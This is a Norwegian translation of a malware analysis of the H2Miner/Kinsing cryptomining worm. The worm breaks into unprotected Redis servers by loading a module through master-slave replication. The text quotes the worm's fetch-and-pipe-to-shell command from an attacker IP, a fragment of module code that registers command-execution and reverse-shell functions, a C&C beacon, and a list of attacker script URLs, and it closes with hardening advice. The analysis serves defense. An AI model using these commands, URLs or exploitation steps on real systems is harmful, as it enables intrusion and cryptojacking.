For en dag siden ble en av prosjektets servere angrepet av en lignende orm. PÄ jakt etter et svar pÄ spÞrsmÄlet "hva var det?" Jeg fant en flott artikkel av Alibaba Cloud Security-teamet. Siden jeg ikke fant denne artikkelen pÄ Habré, bestemte jeg meg for Ä oversette den spesielt for deg <3
Entry
Nylig oppdaget Alibaba Clouds sikkerhetsteam et plutselig utbrudd av H2Miner. Denne typen ondsinnet orm bruker mangelen pÄ autorisasjon eller svake passord for Redis som inngangsporter til systemene dine, hvoretter den synkroniserer sin egen ondsinnede modul med slaven gjennom master-slave-synkronisering og til slutt laster ned denne ondsinnede modulen til den angrepne maskinen og kjÞrer ondsinnet modul. bruksanvisning.
Tidligere ble angrep pÄ systemene dine primÊrt utfÞrt ved hjelp av en metode som involverte planlagte oppgaver eller SSH-nÞkler som ble skrevet til maskinen din etter at angriperen logget pÄ Redis. Heldigvis kan denne metoden ikke brukes ofte pÄ grunn av problemer med tillatelseskontroll eller pÄ grunn av forskjellige systemversjoner. Denne metoden for Ä laste en ondsinnet modul kan imidlertid utfÞre angriperens kommandoer direkte eller fÄ tilgang til skallet, noe som er farlig for systemet ditt.
PÄ grunn av det store antallet servere Med nesten 1 million Redis-instanser pÄ nett, anbefaler Alibaba Clouds sikkerhetsteam, som en vennlig pÄminnelse, at brukere ikke gir Redis-tilgang fra nettverket og regelmessig tester passordene sine for styrke og sÄrbarhet for brute force.
H2Miner
H2Miner er et mining-botnett for systemer basert pÄ Linux, som kan infiltrere systemet ditt pÄ ulike mÄter, inkludert uautorisert Hadoop-garn, Docker og Redis' sÄrbarhet for ekstern kommandokjÞring (RCE). Botnettet opererer ved Ä laste ned ondsinnede skript og skadelig programvare for Ä utvinne dataene dine, utvide angrepet lateralt og opprettholde kommando-og-kontroll-kommunikasjon (C&C).
Redis RCE
Kunnskap om dette emnet ble delt av Pavel Toporkov pÄ ZeroNights 2018. Etter versjon 4.0 stÞtter Redis en plug-in-lastingsfunksjon som gir brukerne muligheten til Ä laste inn filer kompilert med C i Redis for Ä utfÞre spesifikke Redis-kommandoer. Selv om denne funksjonen er nyttig, inneholder den en sÄrbarhet der filer i master-slave-modus kan synkroniseres med slaven via fullresync-modus. Dette kan brukes av en angriper til Ä overfÞre skadelige filer. Etter at overfÞringen er fullfÞrt, laster angriperne modulen til den angrepne Redis-forekomsten og utfÞrer en kommando.
Malware Worm Analyse
Nylig oppdaget Alibaba Cloud-sikkerhetsteamet at stÞrrelsen pÄ H2Miners ondsinnede gruvearbeidergruppe plutselig har Þkt dramatisk. I fÞlge analysen er den generelle prosessen med angrepsforekomst som fÞlger:
H2Miner bruker RCE Redis for et fullverdig angrep. Angripere angriper fĂžrst ubeskyttede Redis-servere eller servere med svake passord.
Deretter bruker de kommandoen config set dbfilename red2.so for Ă„ endre filnavnet. Etter dette utfĂžrer angriperne kommandoen slaveof for Ă„ angi master-slave-replikeringsvertsadressen.
NÄr den angrepne Redis-forekomsten etablerer en master-slave-forbindelse med den ondsinnede Redis som eies av angriperen, sender angriperen den infiserte modulen ved Ä bruke fullresync-kommandoen for Ä synkronisere filene. Red2.so-filen vil da bli lastet ned til den angrepne maskinen. Angriperne bruker deretter lastemodulen ./red2.so for Ä laste denne so-filen. Modulen kan utfÞre kommandoer fra en angriper eller starte en omvendt tilkobling (bakdÞr) for Ä fÄ tilgang til den angrepne maskinen.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Etter Ä ha utfÞrt en ondsinnet kommando som f.eks / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, vil angriperen tilbakestille backupfilnavnet og laste ut systemmodulen for Ä rydde opp i sporene. Red2.so-filen vil imidlertid fortsatt forbli pÄ den angrepne maskinen. Brukere anbefales Ä ta hensyn til tilstedevÊrelsen av en slik mistenkelig fil i mappen til Redis-forekomsten deres.
I tillegg til Ä drepe noen ondsinnede prosesser for Ä stjele ressurser, fulgte angriperen et ondsinnet skript ved Ä laste ned og kjÞre ondsinnede binÊre filer til . Dette betyr at prosessnavnet eller katalognavnet som inneholder kinsing pÄ verten kan indikere at maskinen har blitt infisert av dette viruset.
I fĂžlge omvendt utviklingsresultater utfĂžrer skadelig programvare hovedsakelig fĂžlgende funksjoner:
- Laste opp filer og kjĂžre dem
- Gruvedrift
- Vedlikeholde C&C-kommunikasjon og utfĂžre angriperkommandoer
Bruk masscan for ekstern skanning for Ă„ utvide din innflytelse. I tillegg er IP-adressen til C&C-serveren hardkodet i programmet, og den angrepne verten vil kommunisere med C&C-kommunikasjonsserveren ved hjelp av HTTP-forespĂžrsler, hvor zombie-informasjonen (kompromittert server) identifiseres i HTTP-headeren.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Andre angrepsmetoder
Adresser og lenker som brukes av ormen
/kinsing
âą 142.44.191.122/t.sh
âą 185.92.74.42/h.sh
âą 142.44.191.122/spr.sh
âą 142.44.191.122/spre.sh
âą 195.3.146.118/unk.sh
s&c
âą 45.10.88.102
âą 91.215.169.111
âą 139.99.50.255
âą 46.243.253.167
âą 195.123.220.193
RĂ„det
For det fÞrste skal Redis ikke vÊre tilgjengelig fra Internett og bÞr beskyttes med et sterkt passord. Det er ogsÄ viktig at klienter sjekker at det ikke er noen red2.so-fil i Redis-katalogen og at det ikke er noen "kinsing" i fil-/prosessnavnet pÄ verten.
Kilde: www.habr.com
